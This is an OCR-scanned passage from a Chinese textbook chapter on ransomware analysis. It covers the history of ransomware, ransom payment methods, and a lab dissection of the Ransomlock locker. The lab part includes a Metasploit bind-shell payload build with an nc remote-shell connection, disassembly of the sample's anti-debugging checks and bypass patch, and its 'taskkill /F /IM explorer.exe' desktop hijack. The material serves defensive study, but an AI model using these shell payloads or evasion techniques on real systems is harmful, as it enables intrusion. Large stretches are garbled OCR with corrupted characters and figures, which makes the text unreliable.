此 类 恶意 软件 并 不 是 刚刚 出 现 的 。 使 用 加 密 方 式 的 第 一 个 勒索 软件 称 为 “AIDS 
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Trojan" (GEZZ7K-3), HiJoseph Popp 博 士 在 1989 年 左右 编写 。 在 当时 此 类 恶意 软件 被 
称 为 “cryptoviral extortion ”( 密 但 病毒 勒索 )， 与 如 今 的 命名 有 所 不 同 。 访 病毒 几乎 
加 蜜 便签 上 的 所 有 文件 ， 并 要 求 党 害 者 文 付 189 美 元 到 “PC Cyborg Corporation” (^ 
人 电脑 半 机 器 人 公司 )。 

“ 世 滋 木马 ”采用 对 称 密 钥 来 加 密 用 户 信息 。 因 为 密 钥 是 散在 二 进 制 代码 中 的 ， 
所 以 恢复 被 加 密 的 文件 较为 容易 。 后 来 ， 研 究 人 员 Adam Young 和 Moti Yung 通 过 实 
现 基于 公 钥 加 密 的 方案 ， 修 补 了 这 一 “漏洞 ” 这样 一 来 ， 文 件 会 被 一 个 公 钥 加 密 ， 
一 旦 文 付 了 赎金 ， 受 害 者 就 能 收 到 相应 的 私 钥 进行 解密 。 这 种 场景 下 ， 取 得 解密 密 
钥 变 得 极为 困难 ， 从 而 提升 了 勒索 软件 的 攻击 效果 。 

勒 索 软件 十 分 流行 ， 并 扩展 到 其 他 平台 ， 在 2014 年 中 期 发 现 的 Simplelocker 成 为 
自 个 专 为 Android 设 备 设计 的 勒索 软件 。 


19.2 ”赎金 支付 选项 


站 在 徘 犯 的 角度 ， 了 最 重要 的 是 能 隐匿 地 收取 不 义 之 财 。 这 吏 是 为 什么 这 里 提 到 
的 文 付 方法 会 随时 间 演 变 的 原因 上 所在。 

e 付费 短信 这 是 一 种 发 送 付款 的 简单 方法 ,但 也 很 容易 跟踪 到 收 款 方 。 受害 
者 只 需要 发 送 一 条 短信 即 可 赎 回 计算 机 。 

e 在 线 现金 支付 提供 商 ”这 种 付 蒜 方式 个 必 使 用 信用 卡 ,受害 者 可 到 最 近 的 本 
地 提供 商 处 用 现金 购买 一 些 信用 作证， 以 获取 一 个 具有 文 付 能 力 的 特定 代 
人 码 。 将 此 代码 发 运 到 罪犯 处 即 可 使 计算 机 恢复 正常 运行 。 这 种 情况 下 ， 确认 
收 蒜 方 的 唯一 途径 就 是 对 恶意 软件 的 相 天 代码 厂 段 进行 逆 同 工程 ,一 些 首 名 
的 在 线 现金 文 付 提 供 商 包括 Ukash、MoneyPak 和 Paysafecard。 

e 比特 币 ”比特 币 被 摘 述 为 数字 现金 并 被 认为 是 一 种 数字 货币 (因为 并 不 被 视 
为 真正 的 货币 )， 比 特 币 作为 一 种 点 对 点 的 文 付 方式 在 近期 获得 了 大 量 天 注 。 
由 于 比特 币 可 直接 在 个 人 则 进行 转账 ， 这 就 更 难以 退 中 发送 方 和 接收 方 ， 从 
而 使 得 骗子 们 可 及 用 比 以 往 更 容易 的 方式 来 利用 勒索 软件 获取 利益 。 


N\ 警告 在 考虑 支 付 赎金 之 前 ， 建 议 咨询 最 近 的 技术 支持 人 员 ， 以 尝试 重新 


VA 获得 对 数据 的 控制 权 . 


现在 你 已 经 大 致 了 解 勒索 软件 是 如 何 运 作 的 ， 让 我 们 通过 剖析 几 个 实例 来 进 一 
步 理 解 其 内 部 工作 原理 。 


第 19 章 ”剖析 勒索 软件 


19.3 剖析 Ransomlock 


在 处 理 勒 索 软 件 时 ， 大 多 数 情况 下 动态 分 析 并 无 用 处 。 这 是 因为 一 旦 运行 了 勒 
索 软 件 ， 你 的 更 面 就 将 被 恶意 软件 控制 ， 所 以 ， 你 将 无 法 通过 监控 工具 来 检查 日 志 
或 结果 。 然 而 ， 有 很 多 技巧 可 用 于 在 运行 恶意 软件 后 恢复 计算 机 的 正常 运行 ， 从 而 
访问 监测 结果 。 本 节 将 介绍 Ransomlock 恶 意 软件 ( 它 属于 Lockers 勒 索 软件 系列 )， 并 
包括 针对 此 类 勒索 软件 的 典型 技术 。 


注意 : 本 节 的 练习 之 所 以 作为 示例 而 非 实验 提出 ， 是 因为 练习 需要 使 用 恶 
意 代码 。 
示例 19-1: 动态 分 析 


注意 : 本 节 将 要 分 析 的 Ransomlock 示例 的 MDS 哈 布 值 是 
ED3AEEF329EBFAF6BIIEIC7BABDO9859E3. 


Ransomlockzz Si E BEA, {AANA ZS IETERISERESBZ8 I S8 UI IR TAL AR o 
此 ， 作 为 分 机 人 员 ， 我 们 可 在 虚拟 机 中 留 下 一 个 后 门 ， 以 便 在 任意 时 间 杀 邱 亚 意 进 
程 并 恢复 受 感染 系统 的 控制 权 。 让 我 们 看 看 它 是 如 何 工 作 的 。 

(1) 需要 创建 一 个 绑 定 shell， 用 于 远程 访问 被 感染 的 机 费 。 这 可 人 巡 过 在 Kali 机 融 
中 使 用 Metasploit 来 实现 ， 请 确认 将 RHOST 更 改 为 你 的 卫 。 乔 没有 定义 端口 ， 则 默认 
值 是 4444: 

msfpayload windows/shell bind tcp RHOST-192.168.184.134 X > malo.exe 

cp malo.exe /var/www/GH5/ 

访问 网 址 http:/<kali-IP>/GHSAmalo.exe， 将 malo.exe 下 载 到 受害 者 的 机 器 上 。 

(2) 在 Kali 上 运行 netcat 以 等 竺 远程 shell， 随 后 在 受害 者 机 需 上 运行 malo.exe。 可 
以 看 到 ， 这 里 已 经 接收 到 一 个 Windows shell: 

rootG8kali:/var/www/GH54 nc 192.168.184.134 4444 


Microsoft Windows [Version 6.1.7601] 
Copyright (c) 2009 Microsoft Corporation. All rights reserved. 


C:\Users\Public\Downloads> 


(3) 现在 局 动 Procmon 并 设置 一 个 仅 用 来 监控 lockerexe 的 过 滤 需 : 打开 Filter | 
Filter... 325, CJE “Process Name is locker.exe”( 进 程 名 为 lockerexe)， 单 击 Add 
按钮 ， 然 后 单 击 Apply 按 钮 ， 如 图 19-1 所 示 。 
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Filters were in effect the last time you exited Process Monitor: 
Display entries matching these conditions: 
ess || v || locker.exe| 


———— —- 


Value 
locker.exe 
x] Process N... i System 
ÉJ Process N.. i wmiprvse.exe 
Q3 Process N... i Search Indexer.e... 
G9 Process N... i Explorer. EXE 


m ia Daa = .=m hl i Will =h l= A 


图 19-1 创建 只 监视 lockerexe 进 程 的 过 滤 条 件 


— A 


(4) 1277 RRR. SRILA, BRR aE, JESETR ul 19-2 AANA 
文 的 信息 。 由 于 未 安装 相应 的 语言 包 ， 我 们 会 看 到 很 多 乱码 。 不 过 信息 的 具体 内 容 
对 于 本 练习 来 说 其 实 无 关 大 局 。 


WINDOWS CAÀÁETEEDIA ÀAÍ! 


[dé@izeaiéai Microsoft Security Essentials dé càóeeneóiaai iaidaamaórüe iodi ê iaóaóeaear 
fiónidaoe-ánéi fiaáümaiey, à oa&zá, eneDiaaieá e oe Dazeóiaaiea aeaáiaoádeasa 
iiàógaueó yeáidioüiaüeeey eeáiiàaióeeee Aanüá aienoàey iidedMGa-ad OE DO, à óà&zá 
vàevboy iàaÓooáieài eeodicetinai fiaeaeaiey i yenieoaoaoee II eiónóaoee Microsoft. 

Ii àüoaóoeàcaiüi ióe--eiài 60ieoedieOiaaieà nenoáni áüei iDemoaniaeàin 

AEY 260243088 nenoáni dia ded: 

Lleieoü 45 àánáioa ION- +79879877389 ia ioio 3000 óoásáe. 


+aéa Áüiaéaáaoà Sao iàónüaeuiüeé éià Eid neaaoáo ààanoe à Óarieimaiti iezà TEA. 


HHEBHHEHHEDNEEES ioti 


Oàáàaeoàeüiay iÓinüaà: mea aeoeàaoee nenoàm, aica3ósaoüriy ið fadidaiey aàenoàee 
iÓioeaidá--aueó caelo, à Gaba Badeea yénieoaóoaoee IN Windows. 


AÍEIAÍEA!!! Aiee à oá-àiee 12 —àfüà ñ Hidioa fyacdièy aama nüánáiey, jå 46330 44444 
e, afid Said, aéep-ày Windows 46466 áácaicadaos dazed! Inüo6a róáonoanaeoü 
fiéfoáio i0e333à0 € iàÓooáieyi Hao 440431 espoáóà! 
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(5) 为 通过 订 掉 恶意 进程 来 解锁 屏幕 , 可 转 人 至 步骤 C) 中 获得 的 shell, 运行 tasklist 
/v | find lockerexe， 找 到 lockerexe 并 杀 死 该 进程 (假定 lockerexe 的 PID 是 1S08): 


C:\Users\Public\Downloads\Tools>pskill 1508 
pskill 1508 


PsKill v1.15 - Terminates processes on local or remote systems 
Copyright (C) 1999-2012 Mark Russinovich 
Sysinternals - www.sysinternals.com 


Process 1508 killed. 
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(6) 在 所 有 恶意 进程 都 被 杀 死 后 ， 受 害 者 机 堪 的 昌 面 应 该 被 解 饥 了， 然后 我 们 
就 可 以 检查 Procemon 或 任何 其 他 动态 分 析 工 具 中 的 结果 。 

男 一 种 恢复 受害 者 果 面 的 方式 是 从 远程 shell 局 动 explorer.exe( 该 进程 之 前 被 恶 
意 软件 强行 终止 )。 


G y, / a $B: 事实 上 杀 死 lockerexe 进 程 并 不 意味 着 系统 就 不 再 受 感 娄 了。 执行 这 
WaS 一 步 只 是 为 了 在 感染 后 能 解锁 屏幕 以 分 析 恶 意 软 件 。 


现在 已 经 完成 了 远程 shell 的 相关 操作 ， 让 我 们 返回 虚拟 机 中 己 被 解锁 的 
Windows 系 统 : 

(1) 可 详细 检查 Procmon 中 的 结果 。 可 以 看 到 和 恶意 软件 正在 搜索 taskkillLexe( 大 概 
用 来 杀 邱 explorerexe 进 程 )。 看 起 来 也 像 是 在 寻找 类 似 NAITIONA PARK23423.DLL 
和 HERBAL SCIENCE2340.DLL 这 样 的 目 定 义 DLL。 但 依 徘 该 工具 能 发 现 的 细 太 并 
不 是 很 多 。 

(2) 可 运行 Sysinternals 出 品 的 Autoruns 工 具 ， 并 访问 Logon 选 项 卡 。 从 这 里 可 以 
看 出 每 次 重 司 时 均 会 执行 恶意 代码 ， 因 为 在 Run 键 下 添加 了 explorer 值 ， 并 且 默 认 的 
shell 已 通过 x 改 Winlogon\Shell 键 被 设置 成 lockerexe( 通 第 情况 下 ， 期 望 的 值 是 
explorer.exe). XX FÉ — H 2X ym H] K, RansomlockY 即 就 可 以 获得 控 制 权 ， 如 图 19-3 
PI. 

| © Everything | 吉 Logon | 4d Explorer | 4B Intemet Explorer | À Scheduled Tasks | $a Services | 24 Drivers 


Autorun Entry Description Image Path 
ai HKCUNSOFTWAREMicrosoftwindows NT\Current\ersion\winlogon\S hell 

| E C^Users MEN NND ownloads\locker.exe c:\users RR downloads \locker.exe 
ay HECUSS aftware*MicrosoftVindows*CurrenlversionRun 

Ei = explorer c^user:  downloads‘locker.exe 


图 19-3 ”访问 Autoruns 中 的 Logon 选 项 卡 


所 以 对 于 勒索 软件 的 行为 ， 我 们 已 经 有 了 更 好 的 认识 ， 然 而 还 远 未 理解 其 内 部 
运行 原理 。 动 态 分 析 技 术 有 利于 快速 查看 ， 因 为 有 时 它 能 提供 足够 多 的 用 于 理解 要 
点 的 信息 。 但 我 们 仍然 不 知道 屏幕 是 如 何 被 锁定 的 ， 恶 意 软件 是 否 会 尝试 呼叫 命令 
与 控制 (Command & Control，C&C) 服 务 器 ， 或 存在 任何 其 他 对 受 感染 的 机 器 造成 的 
损害 。 这 些 不 同 的 问题 可 通过 调试 恶意 程序 和 使 用 IDA 做 静态 
在 对 恶意 软件 进行 深入 分 析 时 ， 这 是 一 对 完美 的 组 合 。 


19.3.2 示例 19-2: 静态 分 析 


cx $B: 本 节 将 要 分 析 的 Ransomlock - 4) 4j MDS » 4 fA X 
V—3 ED3AEF329EBF4F6B11E1C7BABD9859E3. 
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BRKT TS zs BH e RH. CURA. RLS eA, HIE TESTS 
理解 其 运作 原理 变 得 极为 困难 。 


注意 : 本 章 中 使 用 的 术语 “解码 ”是 反 混 消 、 脱 汉 或 解密 的 同义词 。 


因此 ， 我 们 有 两 个 目标 : 

。 理解 用 于 避免 可 能 存在 的 检测 、 调 试 和 虚拟 化 的 各 种 “ 反 X X ”技术 。 

e 理解 用 于 桌面 劫持 的 技术 。 在 完成 本 练习 后 , 我 们 应 该 能 够 回答 下 面 这 些 问 
题 : 为 何 我 的 鼠标 和 键盘 停止 工作 了 ? 所 有 窗口 都 消失 了 是 怎么 回 事 ? 为 什 
么 通过 调试 器 来 运行 和 调试 恶意 软件 的 方法 不 能 正常 工作 ? 


1. 在 内 存 中 解码 


我 们 将 再 次 以 前 面 练习 中 用 到 的 locker.exe 为 例 ， 通 过 虚拟 机 中 的 Immunity 
— . lx PROBST AY, E FRA ELA SE TALS AN aE ; 

HJ Bé xe DSL TAE XE Rite A. ERNIE IER A. FEM ASH BT IT 
lockerexe， 并 转 全 如 下 入 口 点 : 


004042C2 PUSH EBP 

004042C3 MOV EBP,ESP 

004042C5 AND ESP, FFFFFFFS8 
004042C8 SUB ESP, 34 

004042CB PUSH EBX 

004042CC PUSH ESI 

004042CD PUSH EDI 

004042CE PUSH locker.004203F690 
004042D3 PUSH 64 

004042D5 PUSH locker.00420558 
004042DA PUSH locker.00420404 
004042DF PUSH locker.00420418 
004042E4 PUSH locker.0042042C 
004042E9 CALL DWORD PTR DS:[«&KERNEL32.GetPrivateProfileStringA»] 


Mibi PURA ARUM, (AALS. AN 
eye 那么 最 终 会 发 现 有 许多 重复 的 代码 解码 出 了 新 指令 


004044A4 MOV EDX,DWORD PTR DS: [420240] 
004044AA MOV ESI,DWORD PTR DS: [4202438] 
004044B0 XOR EDX,ESI 

004044B2 MOV DWORD PTR DS: [420240] , EDX 
004044B8 MOV EDX, DWORD PTR DS:[4203F4| 
004044BE MOV ESI,DWORD PTR DS: [420240] 
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004044C4 ADD DWORD PTR DS:[EDX],ESI 
004044CO6 MOV EDX,DWORD PTR SS: [ESP+30] 
004044CA MOV ESI,DWORD PTR SS: [ESP+34] 
OO4044CE XOR EDX, ECX 

004044D0 ADD EDX,EAX 

004044D2 MOV DWORD PTR DS: [420248] , EDX 


可 以 看 到 ， 地 址 0x420240 和 0x420248 处 的 双 字 数据 (来 自 数据 段 ) 在 一 系列 计算 
后 被 修 改 了 。 这 类 解码 指令 在 整个 二 进 制 代 码 中 被 多 次 上 友 现 ， 音 步调 试 每 一 条 指令 
是 既 乏 味 又 耗 时 的 过 程 。 因 此 ， 需 要 找到 一 种 方法 来 跳 过 这 些 指令 ， 直 达能 帮助 我 
们 了 解 恶意 软件 行为 的 真正 值得 关注 的 代码 部 分 。 

实现 快速 分 析 的 一 种 恨 好 策略 是 找 出 对 运行 时 生成 的 目的 地 址 进行 调用 的 那些 
指令 。 通 音 这 些 地 址 可 在 解码 步骤 完成 时 找到 ， 例 如 在 地 址 00401885 处 便 有 一 条 这 


00401885 FF DOO CALL EAX; 


— 注意 : 上 面 的 指令 位 于 Ox00400000( 基 地 址 )+ 0x1885( 相 对 地 址 ) 处 ， 牢 记 这 


VUX 一 点 会 对 我 们 的 分 析 工作 非常 有 帮助. 

现在 单 步 进入 该 指令 ， 查 看 EAX 的 值 。 可 在 地 址 0x00401885 处 设置 一 个 断 点 ， 
当 到 达 该 断 点 时 可 但 看 到 EAX 的 值 等 于 0x0041FD12， 这 位 于 资源 段 (.rsrc)。 

在 按 下 F7 键 进入 该 调用 之 前 ， 要 确保 删除 所 有 上 断 点 (可 按 下 AlttB 组 合 键 来 获取 
新 点 列表 ， 然 后 使 用 Delete 键 将 其 一 一 清除 )， 因 为 在 内 部 ， 调 试 需 会 将 断 点 处 的 指 
令 的 第 一 个 字 节 改 为 0xCC( 为 了 让 程序 中 断 到 调试 需 )。 因 此 ， 该 处 的 原始 操作 码 FF 
D0@ 将 在 内 存 中 被 更 改 为 CC DO. 但 是 稍 后 ,恶意 软 件 会 将 这 些 指令 复制 到 新 位 置 ， 
这 样 便 会 破坏 随后 将 要 执行 的 指令 。 移 除 断 点 后 ， 调 试 左 改动 的 字 世 会 被 恢复 成 原 
始 值 。 这 就 是 恶意 软件 为 何 要 将 目 身 复制 到 其 他 存储 位 置 的 原因 之 一 一 把 下 一 轮 
中 会 破坏 指令 执行 的 断 点 延续 下 去 。 

移 除 断 点 后 按 下 F7 键 ， 跳 转 到 地 址 0x0041FD12 处 。 在 那里 ， 我 们 继续 按 同 样 的 
SREB KE PUACALL <register> 这 样 的 指令 。 在 接 下 来 的 指令 中 可 以 找到 |: 


0041FD/8 FFDO CALL EAX 


单 步 进 入 上 面 的 调用 ， 我 们 将 跳 转 至 新 的 地 址 空间 。 在 本 例 中 ，EAX 的 当前 值 
是 0x002042C2。 下 面 是 处 于 该 位 置 的 一 些 指令 : 


002042C2 PUSH EBP 
002042C3 MOV EBP,ESP 
002042C5 AND ESP,FFFFFFFG8 
002042C8 SUB ESP, 34 
002042CB PUSH EBX 
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002042CC 
002042CD 
002042CE 
002042D3 
002042D5 
002042DA 
002042DF 
002042E4 
002042E9 


kernel32. 


PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
PUSH 
CALL 


Rus Ee EA HF 23 AT 


ESI 
EDI 
2203F98 
64 
220558 
220404 
220418 
22042C 


DWORD PTR DS:[20F018] ; 
GetPrivateProfileStringA 


或 许 你 还 不 曾 留 意 ， 其 实 这 些 代 码 和 之 前 入 口 点 的 代码 一 模 一 样 ， 只 是 正如 预 
料 中 的 那样 被 复制 到 了 一 个 新 位 置 。 让 我 们 再 次 运用 前 面 的 套路 来 寻找 一 个 CALL 
EAX 指令 ， 应 该 在 基地 址 + 0x1885 处 (在 本 例 中 是 00200000 + 0x1885).. "Bf SIE ID 


儿 一 一 我 们 再 次 在 预期 的 偶 移 处 找到 了 该 指令 : 


00201885 


这 次 运行 时 的 EAX 等 于 0x0021FD12， 所 以 单 步 进入 该 调用 后 ,我 们 得 到 了 下 列 


FFDO CALL EAX 


指令 ， 
0021FD12 PUSH EBP 
0021FD13 MOV EBP, ESP 
0021FD15 AND ESP, FFFFFFFS 
OO21FD18 SUB ESP, 30 
Q021FD1B PUSH ESI 
QO021FD1C PUSH EDI 
OO021FD1D MOV DWORD PTR SS: [ESP+2C],0 
0021FD25 MOV DWORD PTR SS: [ESP+34],0 
0021FD2D LEA EAX,DWORD PTR SS: [ESP+18] 
0021FD31 PUSH EAX 
0021FD32 PUSH DWORD PTR SS: [EBP+1C] 
0021FD35 PUSH DWORD PTR SS: [EBP+138] 
0021FD38 PUSH DWORD PTR SS: [EKBP+14] 
0021FD3B PUSH DWORD PTR SS: [EBP+10] 
0021FD3E PUSH DWORD PTR SS: [EBP+C] 
0021FD41 PUSH DWORD PTR SS: [EBP+8] 
0021FD44 CALL 0021DUDB 
0021FD49 MOV EAX, DWORD PTR SS: [EBP+1C] 
0021FDAC MOV DWORD PTR SS: [ESP+C] ,EAX 
0021FD50 MOV EAX, DWORD PTR SS: [ESP+2C] 
0021FD54 TEST EAX, EAX 
0021FD56 JE 0021FDF1 
0021FD5C MOV EAX, DWORD PTR SS: [ESP+34] 
0021FD60 TEST EAX, EAX 
0021FD62 JE 0021FDF1 


这 里 有 了 一 些 变化 。 首 先 ， 我 们 无 法 在 上 面 的 地 址 中 找 出 另 一 条 CALL EAX 指 
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&, 所 以 可 能 已 接近 解码 阶段 的 尾声 。 实际 上 ,大 单 步 跳 过 0x0021FD44 处 的 调用 ( 按 
下 FE8 键 )， 恶 意 软 件 将 目 行 终止 。 因 此 ， 让 我 们 单 步 进 入 访 调 用 。 为 徐 洁 起 见 ， 可 使 
用 快捷 键 。 最 终 ， 该 恶意 软件 会 跳 回 到 资源 段 地 址 0x0041FB50 处 ， 新 解码 的 指令 正 
在 那里 。 可 在 该 地 址 处 设置 一 个 执行 时 命中 的 (on executiom) 便 件 断 点 以 便 快 速 直达 
那里 ; 在 调试 器 的 命令 窗口 中 执行 dd 0x41fb50 指 令 , 然后 右 击 该 地 址 的 首 字 节 ( 在 左 
下 方 的 Memory 窗 口中 )， 并 选中 Breakpoint | Hardware, on execution 选 项 ， 如 图 19-4 
FIR. 


Backup 
Copy 
Binary 
Label 


I E 
pa "iE^"^r jat, 
FE 1# 

EEE 


= 
Scott 


LE m a 
D4 ,.US-IFES tie. 
BA £Bw|E—.6OH*|E 
C? AHE. 7IHEL4 
n Asl ES 


Breakpoint Memory, on access 
Search for Memory, on write 
Find references Ctri+R 


Hardware, on access 


View executable file : 
Hardware, on write 


Copy t table fil à; 
e a Hardware, on execution 


Go to 
Hex 
Text 
Short 
Long 24 à'&àB... tf tii 
! d tes i0se *iLlsx. L 
Float et $. LDF, LEeEDSPLDS 
Disassemble - 


Special 


图 19-4 BEITE Gp P ES PEST 13 


现在 按 下 F9 键 继续 运行 恶意 软件 ， 并 且 成 功 到 达 了 人 硬件 断 点 。 这 里 是 俩 移 处 的 
第 一 条 指令 ; 正如 预期 的 那样 ， 我 们 可 以 看 到 准备 执行 的 一 组 新 解 公 的 指令 : 


0041FB50 60 PUSHAD 

0041FB51 BE 00404100 MOV ESI,locker.00414000 

0041FB56 SDBE 00DOFEFF LEA EDI, DWORD PTR DS: [ESI+FFFEDOOO] 
OO41FB5C 2] PUSH EDI 

OOQ41FB5D EB OB JMP SHORT locker.0041FB6A 
0041FB5F 90 NOP 


可 以 看 到 ， 第 用 指令 PUSHAD 用 于 保存 当前 CPU 寄存 器 的 值 。 这 通 弟 是 进行 内 
存 数 据 解 码 的 前 过 ， 因 为 恶意 软件 的 代码 段 (texb 被 置 堆 ， 并 将 被 后 续 指 令 填 满 。 这 
清楚 地 告诉 我 们 ， 恶 意 软件 将 在 内 存 中 解码 隐藏 于 自身 的 真正 恶意 指令 。 可 通过 在 
调试 器 的 命令 窗口 中 输入 命令 dd 0x401000 打 印 当 前 内 容 : 
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00401000 00000000000000000000000000000000 ................ | 
00401010 000000 00 00 000000 000000000000 0000 ................ 
00401020 0000 00 00 00 00 00 00 00 0000 0000 000000 ................ 
00401030 0000 00 00 00 00 00 00 00 00 000000 000000 ................ 
00401040 000000 00 00 00 0000 0000000000 000000 ................ | 


单 步 进 入 后 续 指 令 ， 我 们 发 现 整个 代码 区 域 都 已 加 载 芮 正 的 恶意 指令 。 如 采 继 


续 单 步 执 行 ， 可 看 出 恶意 代码 正在 枚 举 进 程 。 因 此 ， 让 我 们 再 次 通过 调试 终 的 命令 
窗口 ， 在 适当 的 API 处 设置 一 个 断 点 : 


bp CreateToolhelp32Snapshot 


按 下 F9 键 继续 运行 ， 当 到 达 断 点 后 按 下 AltHF9, 回 到 位 于 地 址 0x0040DE6B 处 的 


恶意 代码。 在 那里 ， 我 们 看 到 这 些 指令 并 未 被 调试 占 正 人 确 反 汇编 ， 如 图 19-5 所 示 。 


HH460E6E 
AH46DE6C 
HH46DE6D 
AB460E6E 


HE460E6F 
HA4JADETE 
HA4ADEF 1 

Haa LIE rz 
BaaapE rz 
HE460E ?4 
BaeaaapEe-?t5 
BiaadapE 76 
BaadapE?? 

Hide HIE oS 
ARAEDErS 
HEHEHE rH 
HH460E7E 

aa48DE ?C 
aaa4anEg 70 F 
56d46DE7E BS4C6 r4aB5e52 
加 加 半 遇 DE 5 F 
piadanE Se 

Haa LES? 
HE4+HDESS 
HH460ES9 


图 19-5 ”未 能 被 调试 器 正确 反 汇编 的 指令 
为 让 调试 器 能 正确 显示 这 些 指 令 ， 在 左上 方 窗口 中 的 任意 指令 处 单 击 鼠 标 右 


键 ， 并 选中 Analysis | Remove analysis from module 选 项 ， 如 图 19-6 所 示 。 


OPER «xd IM HH EY 1emtwhe Pk bzr..s ? BETTIE 
BB4GDESE E DB SE CHER ' |... 
5E JE SB WINES 


BiasapEsc 
46DEEE Backup j EHFR "3" 

Copy ^ Br 

Binary + 

Modify byte 

Assemble Soace 

Label 

Comment 

Add Header 

Modify Variable 

Breakpoint k 

Hit trace F 

Run trace + 

Mew origin here Ctil- Gray * 

Go to j 

Thread k 


Follow in Dump k 


Search far 

Find references to 
View 

CHER Tur - 
Copy to executable : : 
Analysis 


¥ Y ¥ Y ¥ 


Analyse code Cti+A 


Remove analysis from module 


Scan object files Cti+0 
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操作 完成 后 ， 可 看 到 旺 示 出 了 正确 的 汇编 代码 。 下 列 重 要 地 址 处 的 指令 表明 恶 
意 软 件 正 在 枚 举 进 程 : 

0040DE65 CALL DWORD PTR D5:[413A34] > 

kernel32.CreateToolhelp32Snapshot 


OO40DE85 CALL DWORD PTR DS: [413A4C] ; kernel32.Process32First 
OO40DEA5 CALL DWORD PTR DS: [413A50] ; kernel32.Process32Next 


2. 反 调 试 检 查 


如 上 述 步 又 所 示 , 勒索 软件 使 用 的 第 一 种 反 调 试 技术 是 将 目 身 复制 到 其 他 位 置 。 
因此 ， 如 果 设 置 了 int3(OxCC) 断 点 ， 它 将 被 转移 到 下 一 个 内 存 空 间 ， 这 样 便 会 更 改 
操作 人 码 并 中 断代 人 码 的 执行 。 让 我 们 再 看 看 还 有 其 他 哪些 反 调试 技术 会 被 丑 意 软件 
利用 。 

删除 所 有 断 点 (AlHB)。 然 后 在 左上 方 的 反 汇 编 窗口 中 按 下 CttltG， 转 到 地 址 
0x0040E185 处 并 在 那里 设置 断 点 ， 然 后 按 下 F9 键 。 此 时 恶意 软件 会 枚 举 所 有 进程 及 
相关 的 模块 来 检查 是 否 有 知名 的 调试 器 正在 受 感染 的 系统 中 运行 一 一 这 是 通过 尝试 
找 出 具有 OLLYDBG、DBG、DEBUG、IDAG 或 W32DSM 之 类 名 称 的 进程 或 模块 来 
进行 判断 的 ， 各 图 19- 7 所 示 。 


BB46E185 CMM HA. ASC “ULLYUBL™ 
AB4HE1S ES S9SAFFFF 
SoC 


"DEBUG" 


5 B4aiaaao 
2 Fi56FFFF 
SB45 D4 


aD SS Dt 
S SAFDFFFF 
SBS5 


t=: CES46oe 
5 3053 FFFF 
SSCE 


DB4OES 40 


图 19-7 ”恶意 软件 枚 举 所 有 进程 及 相关 的 模块 
因为 我 们 正在 使 用 的 是 Immunity Debugger， 所 以 不 会 被 检测 到 。 但 即使 使 用 的 


421 


422 


SVD 高 级 恶意 


软件 分 析 


是 OllyDbg, 也 仍然 可 通过 在 运 
代码 来 迫使 恶意 
接 下 来 ， 


E 行 前 更 改 可 执行 文件 的 名 称 或 修改 内 存 中 的 三 进 制 码 


软件 继续 运行 。 
行 继续 单 步 调试 ， 将 会 


发 现 恶 意 软 件 试 图 通过 检索 安装 在 


c:\WWindows\system32\drivers 系 统 日 录 下 有 具有 以 下 第 用 名 称 的 驱动 程 E 来 查找 调试 
fit: Sice.sys、ntice.sys 和 syser.sys, Ja IPS St Fl XT SoftICE FllSyser Kernel Debugger. 
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住 下 继续 ， 


还 包括 对 老 的 虚拟 设备 驱动 程序 
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调用 结束 后 ， 


种 过 时 的 且 很 容易 被 绕 过 


还 可 以 找到 万 


(市 有 .vxd 扩 展 名 ) 及 服务 的 加 载 路 径 ( 如 
。 图 19-8 展 示 了 包含 这 些 反 调 1 
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SHORT locker. @646E41B 
MOU BYTE PTR DS: CEST], 1 


E. iM Ta 


ise wln Le 


Loe cer. Abe 
MOU EAS, 
| locker. 
TEST RL,RL 
SHORT lock 
Mol! BYTE PTR 
LEA EAS, 
locker. Bie 
LEA EA 
Aol! ERS. locker. Ae 1 
locker. pad m 9E 


图 19_8 Ri 反 调试 检查 示例 
一 处 反 调 试 检查 : 


CALL locker.0040DF2C ; JMP to kernel32.IsDebuggerPresent 


十 的 用 来 检查 恶意 软件 是 否 正在 被 调试 的 技术 。 


行 EAX 等 于 0， 就 表示 没有 发 现 调试 器 。 
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结束 了 针对 调试 锅 的 所 有 检查 后 ， 奢 调试 占 和 存在 ， 则 ESI 等 于 1， 肥 之 则 为 0; iX 
值 会 被 保存 在 BL 寄存 器 中 。 


0040E50A MOV BL,BYTE PTR DS: [EST] 


像 下 面 这 样 修改 一 下 上 述 指 令 ( 在 调试 器 窗口 中 双击 该 指令 即 可 进行 修改 ) 就 能 
轻易 地 欺骗 严 意 软件 ， 使 其 误 以 为 不 存在 调试 右 : 


0040E50A MOV BL, 0 


然而 , 我 们 无 法 永久 地 修改 该 二 进 制 代 码 , 因为 这 些 指令 是 在 运行 时 被 解码 的 ， 
这 与 磁盘 上 的 文件 不 一 样 。 但 是 ， 我 们 可 在 修改 完成 后 立即 创建 一 个 虚拟 机 快照 ， 
ARETE PT A E 总 能 从 该 处 开始 进行 调试 。 
最 终 ， 新 的 BL 值 会 被 复制 到 AL 中 。 可 看 到 在 地 址 0x410C52 处 ， 我 们 能 绕 过 对 
调试 器 的 检查 ( 若 AL 等 于 1， 程序 将 终止 ; 否则 会 跳 到 位 置 0x00410C60): 


00410C52  CMP AL,1 
00410C54  JNZ SHORT locker.00410C60 


3. 劫持 桌面 
目前 已 经 做 完 所 有 检查 ， 恶 意 软 件 已 经 准备 好 开始 着 手 劫持 条 面 了 : 


00410C79 MOV EDX,locker.00410DD0; ASCII 
"qwjdzlbPyUtravVxKLIfZsp3B9Y40o0TAGWJ8"6 

00410CA1 -— 

00410CA3 CALL locker.00405194 ; JMP to USER32.FindWindowA 
OO410CA8 MOV EBX, EAX 

OO410CAA PUSH 0 ; SW HIDE 

OO410CAC PUSH EBX 

QOA410CAD CALL locker.00404F5C ; JMP to USER32.ShowWindow 
00410CB2 PUSH 80 

00410CB7 PUSH -14 

OO410CB9 PUSH EBX 


00410CC7 PUSH 0 

OO410CC9 PUSH locker.00410DF4 ; ASCII "taskkill /F /IM 
explorer.exe"6 

00410CCE CALL locker.00404D14 ; JMP to kernel32.WinExec 
OO410CD3 —€— 

00410CED CALL locker.0040520C ; JMP to USER32.SetWindowsHookExAO 


我 们 已 经 创建 了 一 个 具有 特殊 名 称 (窗口 标题 ) 人 @@ 的 恶意 窗口 。 设 窗口 在 
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0x00410CA3 位 置 被 检索 ， 并 在 地 址 0x00410CAD 处 隐藏 起 来 。 这 一 切 将 发 生 在 毫秒 
级 的 时 间 范 围 内 ， 所 以 终端 用 户 其 至 对 此 有 晕 无 觉察 。 RADI Od 重要 的 
